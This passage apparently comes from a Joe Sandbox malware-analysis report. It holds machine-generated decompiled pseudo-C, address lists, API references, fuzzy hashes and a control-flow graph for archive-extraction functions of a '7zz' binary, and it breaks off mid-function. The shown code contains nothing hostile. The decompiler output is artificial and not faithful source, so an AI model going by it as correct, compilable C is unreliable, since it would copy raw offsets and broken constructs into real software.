					_t26 = E00409CBC( *((intOrPtr*)(E00409AD5(_t50 - 0x24, __ecx))));
					L00407A18( *((intOrPtr*)(_t50 - 0x24)));
					_t19 = _t26;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t50 - 0xc));
				return _t19;
			}









                                                                                  0x00409cd0
                                                                                  0x00409cdb
                                                                                  0x00409ce5
                                                                                  0x00409d0f
                                                                                  0x00409d13
                                                                                  0x00409d24
                                                                                  0x00409d6b
                                                                                  0x00409d6b
                                                                                  0x00409d26
                                                                                  0x00409d2b
                                                                                  0x00409d2e
                                                                                  0x00409d31
                                                                                  0x00409d34
                                                                                  0x00409d3e
                                                                                  0x00409d48
                                                                                  0x00409d65
                                                                                  0x00000000
                                                                                  0x00409d4a
                                                                                  0x00409d4e
                                                                                  0x00409d5d
                                                                                  0x00409d5d
                                                                                  0x00409d48
                                                                                  0x00409d15
                                                                                  0x00409d15
                                                                                  0x00409d15
                                                                                  0x00409ce7
                                                                                  0x00409cf3
                                                                                  0x00409cfd
                                                                                  0x00409d03
                                                                                  0x00409d03
                                                                                  0x00409d73
                                                                                  0x00409d7b

                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00409CD0
                                                                                  • CreateDirectoryW.KERNELBASE(?,00000000,0000005C,?,00000000), ref: 00409D0F
                                                                                    • Part of subcall function 00409AD5: __EH_prolog.LIBCMT ref: 00409ADA
                                                                                    • Part of subcall function 00409AD5: AreFileApisANSI.KERNEL32(?,?,?,?,?,00000000), ref: 00409AF6
                                                                                    • Part of subcall function 00409CBC: CreateDirectoryA.KERNEL32(?,00000000,00409CF8,0000005C,?,00000000), ref: 00409CBF
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateDirectoryH_prolog$ApisFile
                                                                                  • String ID:
                                                                                  • API String ID: 299956159-0
                                                                                  • Opcode ID: c1ed0e35f6580321ac6531ab909d6ea8b72f2d8cf8691d9e8c9056453fa2db36
                                                                                  • Instruction ID: 5baa69c7bf3f06f08d1d002de2e3150f630ab666195b0682027b480874592da2
                                                                                  • Opcode Fuzzy Hash: c1ed0e35f6580321ac6531ab909d6ea8b72f2d8cf8691d9e8c9056453fa2db36
                                                                                  • Instruction Fuzzy Hash: 17119032E441059ACB14AFA5E8825AEBB79AF80314F10443FE405B32D2CB380E459BA9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00415D31 Relevance: 6.0, APIs: 1, Strings: 2, Instructions: 726COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 2165 415d31-415d94 __EH_prolog call 404ad0 2168 415d96-415d99 2165->2168 2169 415d9b-415d9e 2165->2169 2170 415da1-415da8 2168->2170 2169->2170 2171 415e28-415e3e call 4079f2 2170->2171 2172 415daa-415dc7 call 40351a 2170->2172 2177 415e40-415e47 call 41669f 2171->2177 2178 415e73 2171->2178 2179 415dc9-415de1 call 40b431 2172->2179 2180 415ded-415e26 call 42389f call 407a18 2172->2180 2183 415e75-415e80 2177->2183 2178->2183 2190 415de3-415deb 2179->2190 2191 415e49-415e59 call 46b8f4 2179->2191 2180->2171 2180->2172 2187 415e82-415e84 2183->2187 2188 415e88-415ed4 2183->2188 2187->2188 2193 415f10-415f16 2188->2193 2194 415ed6-415eea 2188->2194 2190->2180 2198 415e5e-415e6e call 46b8f4 2190->2198 2191->2198 2196 415f1c-415f3c call 40351a 2193->2196 2197 4163df-416441 2193->2197 2194->2193 2205 415eec-415ef1 2194->2205 2211 415f4f-415f61 call 40b431 2196->2211 2212 415f3e-415f4d 2196->2212 2203 416443-416445 2197->2203 2204 416449-416458 call 408604 2197->2204 2198->2178 2203->2204 2213 41645a-416468 2204->2213 2208 415ef3-415ef5 2205->2208 2209 415ef9-415f0b call 408604 2205->2209 2208->2209 2209->2213 2220 415f67-415f6f 2211->2220 2221 41668a-41669a call 46b8f4 2211->2221 2215 415f75-415f90 2212->2215 2224 415f96-415fd7 call 4033db call 404ad0 call 40862d call 443f76 2215->2224 2225 41646b-416479 call 407a18 2215->2225 2220->2215 2220->2221 2241 416118-41613f call 418a23 2224->2241 2242 415fdd-415fe5 2224->2242 2230 416481-416484 2225->2230 2231 41647b-41647d 2225->2231 2234 416674-416685 call 408604 2230->2234 2231->2230 2234->2213 2247 416145-41616f call 46c55c 2241->2247 2248 416489-4164b2 call 408604 call 403411 call 407a18 2241->2248 2242->2241 2244 415feb-415fed 2242->2244 2245 415ff1-415ff5 2244->2245 2249 415ff7-415ff9 2245->2249 2250 415fff-416006 2245->2250 2263 416175-416178 2247->2263 2264 4164c4-4164ed call 408604 call 403411 call 407a18 2247->2264 2272 4164b4-4164b6 2248->2272 2273 4164ba-4164bf 2248->2273 2251 416008 2249->2251 2252 415ffb-415ffd 2249->2252 2253 41600c-41600f 2250->2253 2251->2253 2252->2245 2253->2241 2256 416015-41603b call 4072c9 call 417651 2253->2256 2278 416041-416050 call 408053 2256->2278 2279 41610b-416117 call 407a18 2256->2279 2269 4163a8-4163d9 call 408604 call 403411 call 407a18 2263->2269 2270 41617e-416183 2263->2270 2307 4164f5-4164f8 2264->2307 2308 4164ef-4164f1 2264->2308 2269->2196 2269->2197 2276 416213 2270->2276 2277 416189-416192 2270->2277 2272->2273 2273->2234 2280 416219 2276->2280 2277->2280 2283 416198-4161b1 call 40373d 2277->2283 2278->2279 2297 416056-41608a call 407399 call 401e26 call 407a18 2278->2297 2279->2241 2286 416247-41626f call 401e9a 2280->2286 2287 41621b-416241 2280->2287 2302 4161b3-4161b9 2283->2302 2303 416205-416211 2283->2303 2316 416275-416278 2286->2316 2317 416536-416568 call 407a18 call 408604 call 403411 call 407a18 2286->2317 2287->2286 2306 4164fd-416526 call 408604 call 403411 call 407a18 2287->2306 2297->2279 2335 41608c-41608f 2297->2335 2302->2303 2310 4161bb-416202 call 408784 2302->2310 2303->2276 2303->2283 2347 416528-41652a 2306->2347 2348 41652e-416531 2306->2348 2307->2234 2308->2307 2310->2303 2322 416291-41629c 2316->2322 2323 41627a-41628b 2316->2323 2375 416570-416573 2317->2375 2376 41656a-41656c 2317->2376 2326 4162d5-4162e7 2322->2326 2327 41629e-4162ad 2322->2327 2323->2322 2339 416578-4165aa call 407a18 call 408604 call 403411 call 407a18 2323->2339 2336 4162f3 2326->2336 2337 4162e9-4162ec 2326->2337 2333 4162c7-4162d3 2327->2333 2334 4162af-4162c1 2327->2334 2333->2326 2333->2327 2334->2333 2355 4165ba-4165ec call 407a18 call 408604 call 403411 call 407a18 2334->2355 2342 416093-416097 2335->2342 2344 4162f5-416332 call 416922 2336->2344 2337->2336 2343 4162ee-4162f1 2337->2343 2403 4165b2-4165b5 2339->2403 2404 4165ac-4165ae 2339->2404 2350 4160a1-4160a5 2342->2350 2351 416099-41609b 2342->2351 2343->2344 2359 416337-41633c 2344->2359 2347->2348 2348->2234 2358 4160aa-4160ac 2350->2358 2356 4160a7 2351->2356 2357 41609d-41609f 2351->2357 2411 4165f4-4165f7 2355->2411 2412 4165ee-4165f0 2355->2412 2356->2358 2357->2342 2358->2279 2363 4160ae-4160e2 call 4072c9 call 417651 call 407a18 2358->2363 2364 416342-416347 2359->2364 2365 4165f9-41662b call 407a18 call 408604 call 403411 call 407a18 2359->2365 2363->2279 2405 4160e4-4160f3 call 40807a 2363->2405 2367 416369-41636c 2364->2367 2368 416349-416367 2364->2368 2415 416633-416636 2365->2415 2416 41662d-41662f 2365->2416 2374 41636f-41639c 2367->2374 2368->2374 2381 4163a2-4163a7 call 407a18 2374->2381 2382 416638-416667 call 407a18 call 408604 call 403411 call 407a18 2374->2382 2375->2234 2376->2375 2381->2269 2422 416669-41666b 2382->2422 2423 41666f 2382->2423 2403->2234 2404->2403 2405->2279 2418 4160f5-416106 call 415c6d * 2 2405->2418 2411->2234 2412->2411 2415->2234 2416->2415 2418->2279 2422->2423 2423->2234
                                                                                  C-Code - Quality: 87%
                                                                                  			E00415D31(intOrPtr __ecx, signed int __edx, void* __eflags) {
				signed int _t453;
				signed int _t454;
				intOrPtr _t465;
				signed int _t468;
				signed int _t477;
				intOrPtr* _t485;
				signed int _t486;
				signed int _t487;
				signed char _t491;
				signed int _t496;
				intOrPtr _t505;
				signed int _t509;
				signed int _t519;
				signed int _t532;
				signed int _t539;
				signed int _t540;
				signed int _t544;
				intOrPtr _t553;
				intOrPtr _t554;
				intOrPtr _t563;
				signed int _t565;
				signed int _t573;
				signed int* _t581;
				signed int _t582;
				signed int _t589;
				signed int _t601;
				short* _t602;
				signed int _t610;
				signed int _t612;
				void* _t614;
				signed int _t617;
				signed int _t618;
				signed int _t620;
				void* _t623;
				signed int _t626;
				signed int* _t631;
				signed int _t632;
				signed int _t661;
				char* _t662;
				signed int _t669;
				intOrPtr* _t670;
				intOrPtr* _t671;
				intOrPtr* _t672;
				intOrPtr _t714;
				signed int* _t724;
				signed int _t747;
				void* _t748;
				intOrPtr _t756;
				signed int _t770;
				signed int _t771;
				signed int _t780;
				signed int _t785;
				signed int _t786;
				signed int _t788;
				signed int _t790;
				void* _t791;

				_t770 = __edx;
				L0046B890(E004749BF, _t791);
				_t780 =  *(_t791 + 0x24);
				 *((intOrPtr*)(_t791 - 0x34)) = __ecx;
				 *((intOrPtr*)(_t791 - 0x4c)) = __edx;
				 *((intOrPtr*)(_t780 + 0x20)) = 0;
				 *((intOrPtr*)(_t780 + 0x18)) = 0;
				 *((intOrPtr*)(_t780 + 0x10)) = 0;
				 *((intOrPtr*)(_t780 + 8)) = 0;
				 *_t780 = 0;
				 *((intOrPtr*)(_t780 + 0x24)) = 0;
				 *((intOrPtr*)(_t780 + 0x1c)) = 0;
				 *((intOrPtr*)(_t780 + 0x14)) = 0;
				 *((intOrPtr*)(_t780 + 0xc)) = 0;
				 *(_t780 + 4) = 0;
				 *((intOrPtr*)(_t780 + 0x28)) = 0;
				 *(_t791 - 0x18) = 0;
				 *(_t791 - 0x14) = 0;
				E00404AD0(_t791 - 0xe8, 8);
				 *((intOrPtr*)(_t791 - 0xe8)) = 0x47a688;
				 *(_t791 - 4) = 0;
				if( *( *(_t791 + 0x14)) == 0) {
					_t453 =  *( *((intOrPtr*)(_t791 + 8)) + 8);
				} else {
					_t453 = 1;
				}
				_t785 = 0;
				 *(_t791 - 0x24) = _t453;
				if(_t453 <= 0) {
					L8:
					_push(0xf8);
					_t454 = L004079F2();
					_t661 = _t454;
					 *(_t791 + 0x24) = _t661;
					 *(_t791 - 4) = 2;
					if(_t661 == 0) {
						goto L12;
					} else {
						L112();
						_t786 = _t454;
					}
				} else {
					do {
						L0040351A(_t791 - 0x70);
						 *(_t791 - 4) = 1;
						 *(_t791 - 0x98) = 0;
						 *((intOrPtr*)(_t791 - 0x94)) = 0;
						_t801 =  *( *(_t791 + 0x14));
						if( *( *(_t791 + 0x14)) != 0) {
							goto L7;
						} else {
							_push( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t791 + 8)) + 0xc)) + _t785 * 4)))));
							if(E0040B431(_t791 - 0x98, _t770, _t801) == 0) {
								 *(_t791 + 0x14) = "there is no such archive";
								L0046B8F4(_t791 + 0x14, 0x47cf70);
								L11:
								 *(_t791 + 0x14) = "can\'t decompress folder";
								L0046B8F4(_t791 + 0x14, 0x47cf70);
								L12:
								_t786 = 0;
								__eflags = 0;
							} else {
								if(( *(_t791 - 0x78) >> 0x00000004 & 0x00000001) != 0) {
									goto L11;
								} else {
									goto L7;
								}
							}
						}
						goto L13;
						L7:
						L0042389F(_t791 - 0xe8,  *(_t791 - 0x98),  *((intOrPtr*)(_t791 - 0x94)));
						 *(_t791 - 0x18) =  *(_t791 - 0x18) +  *(_t791 - 0x98);
						 *(_t791 - 4) = 0;
						asm("adc [ebp-0x14], ecx");
						L00407A18( *((intOrPtr*)(_t791 - 0x70)));
						_t785 = _t785 + 1;
					} while (_t785 <  *(_t791 - 0x24));
					goto L8;
				}
				L13:
				 *(_t791 - 4) = 0;
				 *(_t791 - 0xec) = _t786;
				if(_t786 != 0) {
					 *((intOrPtr*)( *_t786 + 4))(_t786);
				}
				_t662 =  *(_t791 + 0x14);
				 *(_t791 - 4) = 3;
				_t771 = _t770 & 0xffffff00 |  *(_t791 - 0x24) - 0x00000001 > 0x00000000;
				 *((intOrPtr*)(_t786 + 0xe8)) = 0;
				 *((intOrPtr*)(_t786 + 0xe0)) = 0;
				 *((intOrPtr*)(_t786 + 0xd8)) = 0;
				 *(_t786 + 0xbb) = _t771;
				 *(_t786 + 0x30) = _t662[8];
				 *(_t786 + 0x34) = _t662[0xc];
				 *((intOrPtr*)(_t786 + 0xec)) = 0;
				 *((intOrPtr*)(_t786 + 0xe4)) = 0;
				 *((intOrPtr*)(_t786 + 0xdc)) = 0;
				 *((intOrPtr*)(_t786 + 0xf0)) = 0;
				if(_t771 == 0) {
					L20:
					__eflags =  *(_t791 - 0x24);
					 *(_t791 - 0x20) = 0;
					if( *(_t791 - 0x24) <= 0) {
						L79:
						__eflags = _t786;
						 *((intOrPtr*)(_t780 + 0x18)) =  *((intOrPtr*)(_t786 + 0xd8));
						 *((intOrPtr*)(_t780 + 0x1c)) =  *((intOrPtr*)(_t786 + 0xdc));
						 *((intOrPtr*)(_t780 + 0x20)) =  *((intOrPtr*)(_t786 + 0xe0));
						 *((intOrPtr*)(_t780 + 0x24)) =  *((intOrPtr*)(_t786 + 0xe4));
						 *((intOrPtr*)(_t780 + 8)) =  *((intOrPtr*)(_t786 + 0xe8));
						 *((intOrPtr*)(_t780 + 0xc)) =  *((intOrPtr*)(_t786 + 0xec));
						 *((intOrPtr*)(_t780 + 0x28)) =  *((intOrPtr*)(_t786 + 0xf0));
						 *(_t791 - 4) = 0;
						asm("cdq");
						 *_t780 =  *( *((intOrPtr*)(_t791 + 8)) + 8);
						 *(_t780 + 4) = _t771;
						_t465 =  *((intOrPtr*)(_t786 + 0xd0));
						 *((intOrPtr*)(_t780 + 0x10)) =  *((intOrPtr*)(_t465 + 0x20));
						 *((intOrPtr*)(_t780 + 0x14)) =  *((intOrPtr*)(_t465 + 0x24));
						if(_t786 != 0) {
							 *((intOrPtr*)( *_t786 + 8))(_t786);
						}
						 *(_t791 - 4) =  *(_t791 - 4) | 0xffffffff;
						E00408604(_t791 - 0xe8);
						_t468 = 0;
						__eflags = 0;
						goto L82;
					} else {
						do {
							 *(_t791 + 0x24) =  *( *((intOrPtr*)( *((intOrPtr*)(_t791 + 8)) + 0xc)) +  *(_t791 - 0x20) * 4);
							L0040351A(_t791 - 0x70);
							 *(_t791 - 4) = 4;
							__eflags =  *( *(_t791 + 0x14));
							if(__eflags == 0) {
								_t669 = _t791 - 0x98;
								_push( *( *(_t791 + 0x24)));
								_t477 = E0040B431(_t669, _t771, __eflags);
								__eflags = _t477;
								if(_t477 == 0) {
									L111:
									 *(_t791 + 0x14) = "there is no such archive";
									L0046B8F4(_t791 + 0x14, 0x47cf70);
									L0046B890(E00474A50, _t791);
									_push(_t669);
									_push(_t669);
									_push(0);
									_push(_t786);
									_t788 = _t669;
									_push(_t780);
									 *(_t791 - 0x10) = _t788;
									 *_t788 = 0x47ab60;
									 *((intOrPtr*)(_t788 + 4)) = 0x47a78c;
									 *((intOrPtr*)(_t788 + 8)) = 0x47ab50;
									 *((intOrPtr*)(_t788 + 0xc)) = 0;
									 *((intOrPtr*)(_t788 + 0x18)) = 0;
									 *(_t791 - 4) = 0;
									 *((intOrPtr*)(_t788 + 0x1c)) = 0;
									 *((intOrPtr*)(_t788 + 0x20)) = 0;
									_t670 = _t788 + 0x24;
									 *(_t791 - 4) = 2;
									 *_t670 = 0;
									 *((intOrPtr*)(_t670 + 4)) = 0;
									 *((intOrPtr*)(_t670 + 8)) = 0;
									E00401E9A(_t670, 3);
									_t671 = _t788 + 0x38;
									 *(_t791 - 4) = 3;
									 *_t671 = 0;
									 *((intOrPtr*)(_t671 + 4)) = 0;
									 *((intOrPtr*)(_t671 + 8)) = 0;
									E00401E9A(_t671, 3);
									_t672 = _t788 + 0x44;
									 *(_t791 - 4) = 4;
									 *_t672 = 0;
									 *((intOrPtr*)(_t672 + 4)) = 0;
									 *((intOrPtr*)(_t672 + 8)) = 0;
									E00401E9A(_t672, 3);
									 *((char*)(_t788 + 0x5a)) = 1;
									 *((char*)(_t788 + 0x5b)) = 1;
									 *((char*)(_t788 + 0x5c)) = 1;
									 *((intOrPtr*)(_t788 + 0x98)) = 0;
									 *((intOrPtr*)(_t788 + 0xa0)) = 0;
									_t485 = _t788 + 0xa4;
									 *((intOrPtr*)(_t485 + 4)) = 0;
									 *((intOrPtr*)(_t485 + 8)) = 0;
									 *((intOrPtr*)(_t485 + 0xc)) = 0;
									 *((intOrPtr*)(_t485 + 0x10)) = 4;
									 *_t485 = 0x47a420;
									_t782 = _t788 + 0xbc;
									 *((char*)(_t788 + 0xbb)) = 0;
									 *((intOrPtr*)(_t788 + 0xbc)) = 0;
									_push(0x38);
									 *(_t791 - 4) = 9;
									 *_t788 = 0x47ab30;
									 *((intOrPtr*)(_t788 + 4)) = 0x47ab20;
									 *((intOrPtr*)(_t788 + 8)) = 0x47ab10;
									_t486 = L004079F2();
									 *(_t791 - 0x14) = _t486;
									__eflags = _t486;
									 *(_t791 - 4) = 0xa;
									if(_t486 == 0) {
										_t487 = 0;
										__eflags = 0;
									} else {
										_t487 = L0040F3E5(_t486);
									}
									 *(_t791 - 4) = 9;
									 *((intOrPtr*)(_t788 + 0xd0)) = _t487;
									E0040C9B4(_t782, _t487);
									 *[fs:0x0] =  *((intOrPtr*)(_t791 - 0xc));
									return _t788;
								} else {
									_t491 =  *(_t791 - 0x78) >> 4;
									__eflags = _t491 & 0x00000001;
									if((_t491 & 0x00000001) != 0) {
										goto L111;
									} else {
										goto L25;
									}
								}
							} else {
								 *(_t791 - 0x98) = 0;
								 *((intOrPtr*)(_t791 - 0x94)) = 0;
								 *(_t791 - 0x78) = 0;
								L25:
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t791 + 0x18)))) + 0x18))();
								_t496 =  *((intOrPtr*)( *( *(_t791 + 0x1c)) + 0x24))( *( *(_t791 + 0x24)));
								__eflags = _t496;
								 *(_t791 - 0x1c) = _t496;
								if(_t496 != 0) {
									L00407A18( *((intOrPtr*)(_t791 - 0x70)));
									__eflags = _t786;
									 *(_t791 - 4) = 0;
									if(_t786 != 0) {
										 *((intOrPtr*)( *_t786 + 8))(_t786);
									}
									_t790 =  *(_t791 - 0x1c);
									goto L110;
								} else {
									L004033DB(_t791 - 0xd4);
									 *(_t791 - 4) = 5;
									E00404AD0(_t791 - 0x48, 4);
									 *(_t791 - 4) = 6;
									 *((intOrPtr*)(_t791 - 0x48)) = 0x47a668;
									E0040862D();
									_push( *((intOrPtr*)(_t791 - 0x4c)));
									L00443F76(_t791 - 0x48);
									_t505 =  *((intOrPtr*)(_t791 - 0x4c));
									 *(_t791 - 4) = 7;
									__eflags =  *(_t505 + 8);
									if( *(_t505 + 8) == 0) {
										_t747 =  *(_t791 + 0x24);
										_t601 =  *(_t747 + 4);
										__eflags = _t601;
										if(_t601 != 0) {
											_t748 =  *_t747;
											_t602 = _t748 + _t601 * 2 - 2;
											while(1) {
												__eflags =  *_t602 - 0x2e;
												if( *_t602 == 0x2e) {
													break;
												}
												__eflags = _t602 - _t748;
												if(_t602 == _t748) {
													_t125 = _t791 - 0x10;
													 *_t125 =  *(_t791 - 0x10) | 0xffffffff;
													__eflags =  *_t125;
												} else {
													_t602 = _t602;
													continue;
												}
												L34:
												__eflags =  *(_t791 - 0x10);
												if( *(_t791 - 0x10) >= 0) {
													L004072C9( *(_t791 + 0x24), _t791 - 0x58,  *(_t791 - 0x10) + 1);
													 *(_t791 - 4) = 8;
													_t610 = L00417651( *((intOrPtr*)(_t791 - 0x34)), _t791 - 0x58);
													__eflags = _t610;
													 *(_t791 - 0x1c) = _t610;
													if(_t610 >= 0) {
														_t612 = E00408053( *((intOrPtr*)(_t791 - 0x58)), L"001");
														__eflags = _t612;
														if(_t612 == 0) {
															_t614 = L00407399( *(_t791 + 0x24), _t791 - 0x104,  *(_t791 - 0x10));
															 *(_t791 - 4) = 9;
															E00401E26(_t791 - 0x58, _t614);
															 *(_t791 - 4) = 8;
															L00407A18( *((intOrPtr*)(_t791 - 0x104)));
															_t617 =  *(_t791 - 0x54);
															__eflags = _t617;
															if(_t617 != 0) {
																_t756 =  *((intOrPtr*)(_t791 - 0x58));
																_t618 = _t756 + _t617 * 2 - 2;
																while(1) {
																	__eflags =  *_t618 - 0x2e;
																	if( *_t618 == 0x2e) {
																		break;
																	}
																	__eflags = _t618 - _t756;
																	if(_t618 == _t756) {
																		_t620 = _t618 | 0xffffffff;
																		__eflags = _t620;
																	} else {
																		_t618 = _t618;
																		continue;
																	}
																	L44:
																	__eflags = _t620;
																	if(_t620 >= 0) {
																		_t623 = L004072C9(_t791 - 0x58, _t791 - 0xf8, _t620 + 1);
																		 *(_t791 - 4) = 0xa;
																		 *(_t791 - 0x10) = L00417651( *((intOrPtr*)(_t791 - 0x34)), _t623);
																		 *(_t791 - 4) = 8;
																		L00407A18( *((intOrPtr*)(_t791 - 0xf8)));
																		__eflags =  *(_t791 - 0x10);
																		if( *(_t791 - 0x10) >= 0) {
																			_t626 = E0040807A(L"rar");
																			__eflags = _t626;
																			if(_t626 != 0) {
																				E00415C6D(_t791 - 0x48,  *(_t791 - 0x10));
																				E00415C6D(_t791 - 0x48,  *(_t791 - 0x1c));
																			}
																		}
																	}
																	goto L48;
																}
																_t620 = _t618 - _t756 >> 1;
																goto L44;
															}
														}
													}
													L48:
													 *(_t791 - 4) = 7;
													L00407A18( *((intOrPtr*)(_t791 - 0x58)));
												}
												goto L49;
											}
											 *(_t791 - 0x10) = _t602 - _t748 >> 1;
											goto L34;
										}
									}
									L49:
									_push( *((intOrPtr*)(_t791 + 0x18)));
									_push( *(_t791 + 0x24));
									_push(0);
									_push( *( *(_t791 + 0x14)));
									_push(_t791 - 0x48);
									_push( *((intOrPtr*)(_t791 - 0x34)));
									_t509 = E00418A23(_t791 - 0xd4); // executed
									__eflags = _t509 - 0x80004004;
									 *(_t791 - 0x10) = _t509;
									if(_t509 == 0x80004004) {
										 *(_t791 - 4) = 5;
										E00408604(_t791 - 0x48);
										 *(_t791 - 4) = 4;
										L00403411(_t791 - 0xd4);
										L00407A18( *((intOrPtr*)(_t791 - 0x70)));
										__eflags = _t786;
										 *(_t791 - 4) = 0;
										if(_t786 != 0) {
											 *((intOrPtr*)( *_t786 + 8))(_t786);
										}
										_t790 = 0x80004004;
										goto L110;
									} else {
										 *((char*)(_t791 - 0x9c)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t791 + 0x18)))) + 0x14))();
										_t771 =  *( *(_t791 + 0x1c));
										_t519 =  *((intOrPtr*)(_t771 + 0x28))( *( *(_t791 + 0x24)),  *(_t791 - 0x10),  *((intOrPtr*)(_t791 - 0x9c)));
										__eflags = _t519;
										 *(_t791 + 0x24) = _t519;
										if(_t519 != 0) {
											 *(_t791 - 4) = 5;
											E00408604(_t791 - 0x48);
											 *(_t791 - 4) = 4;
											L00403411(_t791 - 0xd4);
											L00407A18( *((intOrPtr*)(_t791 - 0x70)));
											__eflags = _t786;
											 *(_t791 - 4) = 0;
											if(_t786 != 0) {
												 *((intOrPtr*)( *_t786 + 8))(_t786);
											}
											_t790 =  *(_t791 + 0x24);
											goto L110;
										} else {
											__eflags =  *(_t791 - 0x10);
											if( *(_t791 - 0x10) != 0) {
												goto L78;
											} else {
												__eflags =  *( *(_t791 + 0x14));
												if( *( *(_t791 + 0x14)) != 0) {
													L58:
													__eflags =  *(_t791 - 0xb8);
												} else {
													__eflags =  *(_t791 - 0xb8);
													 *(_t791 - 0x10) = 0;
													if(__eflags > 0) {
														do {
															_t589 = L0040373D(_t771,  *((intOrPtr*)( *((intOrPtr*)(_t791 - 0xb4)) +  *(_t791 - 0x10) * 4)));
															__eflags = _t589;
															 *(_t791 + 0x24) = _t589;
															if(_t589 >= 0) {
																__eflags =  *(_t791 + 0x24) -  *(_t791 - 0x20);
																if( *(_t791 + 0x24) >  *(_t791 - 0x20)) {
																	 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t791 + 8)))) + 4))( *(_t791 + 0x24), 1);
																	 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t791 + 0xc)))) + 4))( *(_t791 + 0x24), 1);
																	_t201 = _t791 - 0x18;
																	 *_t201 =  *(_t791 - 0x18) -  *((intOrPtr*)( *((intOrPtr*)(_t791 - 0xdc)) +  *(_t791 + 0x24) * 8));
																	__eflags =  *_t201;
																	asm("sbb [ebp-0x14], eax");
																	E00408784(_t791 - 0xe8,  *(_t791 + 0x24), 1);
																	 *(_t791 - 0x24) =  *( *((intOrPtr*)(_t791 + 8)) + 8);
																}
															}
															 *(_t791 - 0x10) =  *(_t791 - 0x10) + 1;
															__eflags =  *(_t791 - 0x10) -  *(_t791 - 0xb8);
														} while ( *(_t791 - 0x10) <  *(_t791 - 0xb8));
														goto L58;
													}
												}
												if(__eflags == 0) {
													L61:
													 *((intOrPtr*)(_t791 - 0x30)) = 0;
													 *(_t791 - 0x2c) = 0;
													 *((intOrPtr*)(_t791 - 0x28)) = 0;
													E00401E9A(_t791 - 0x30, 3);
													 *(_t791 - 4) = 0xb;
													_t532 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t791 + 0x18)))) + 0x10))(_t791 - 0x30);
													__eflags = _t532;
													 *(_t791 + 0x24) = _t532;
													if(_t532 != 0) {
														L00407A18( *((intOrPtr*)(_t791 - 0x30)));
														 *(_t791 - 4) = 5;
														E00408604(_t791 - 0x48);
														 *(_t791 - 4) = 4;
														L00403411(_t791 - 0xd4);
														L00407A18( *((intOrPtr*)(_t791 - 0x70)));
														__eflags = _t786;
														 *(_t791 - 4) = 0;
														if(_t786 != 0) {
															 *((intOrPtr*)( *_t786 + 8))(_t786);
														}
														_t790 =  *(_t791 + 0x24);
														goto L110;
													} else {
														__eflags =  *(_t791 - 0x2c);
														if( *(_t791 - 0x2c) == 0) {
															L64:
															_t539 =  *(_t791 - 0xcc);
															 *(_t791 + 0x24) = 0;
															__eflags = _t539;
															if(_t539 <= 0) {
																L68:
																_t540 =  *( *((intOrPtr*)(_t791 - 0xc8)) + _t539 * 4 - 4);
																 *(_t791 + 0x24) = _t540;
																__eflags =  *( *(_t791 + 0x14));
																if( *( *(_t791 + 0x14)) != 0) {
																	L71:
																	__eflags = 0;
																} else {
																	__eflags =  *(_t791 - 0x74);
																	if(__eflags != 0) {
																		goto L71;
																	} else {
																		_push(1);
																		_pop(0);
																	}
																}
																 *((char*)(_t540 + 0x2c)) = 0;
																 *((intOrPtr*)(_t540 + 0x24)) =  *((intOrPtr*)(_t791 - 0x80));
																 *((intOrPtr*)(_t540 + 0x28)) =  *((intOrPtr*)(_t791 - 0x7c));
																asm("adc ecx, [ebp-0x94]");
																_t544 = E00416922( *(_t791 + 0x24),  *((intOrPtr*)(_t791 + 0x10)), __eflags,  *((intOrPtr*)(_t791 - 0xac)) +  *(_t791 - 0x98),  *(_t791 - 0xa8),  *(_t791 + 0x14),  *(_t791 + 0x1c), _t786,  *((intOrPtr*)(_t791 + 0x20)), _t791 - 0x60); // executed
																__eflags = _t544;
																 *(_t791 + 0x24) = _t544;
																if(_t544 != 0) {
																	L00407A18( *((intOrPtr*)(_t791 - 0x30)));
																	 *(_t791 - 4) = 5;
																	E00408604(_t791 - 0x48);
																	 *(_t791 - 4) = 4;
																	L00403411(_t791 - 0xd4);
																	L00407A18( *((intOrPtr*)(_t791 - 0x70)));
																	__eflags = _t786;
																	 *(_t791 - 4) = 0;
																	if(_t786 != 0) {
																		 *((intOrPtr*)( *_t786 + 8))(_t786);
																	}
																	_t790 =  *(_t791 + 0x24);
																	goto L110;
																} else {
																	__eflags =  *( *(_t791 + 0x14));
																	if( *( *(_t791 + 0x14)) != 0) {
																		_t771 =  *(_t791 - 0x5c);
																		_t714 =  *((intOrPtr*)(_t791 - 0x60));
																	} else {
																		_t771 =  *(_t791 - 0xa8);
																		_t714 =  *((intOrPtr*)(_t791 - 0xac)) +  *(_t791 - 0x98);
																		asm("adc edx, [ebp-0x94]");
																		 *((intOrPtr*)(_t791 - 0x60)) = _t714;
																		 *(_t791 - 0x5c) = _t771;
																	}
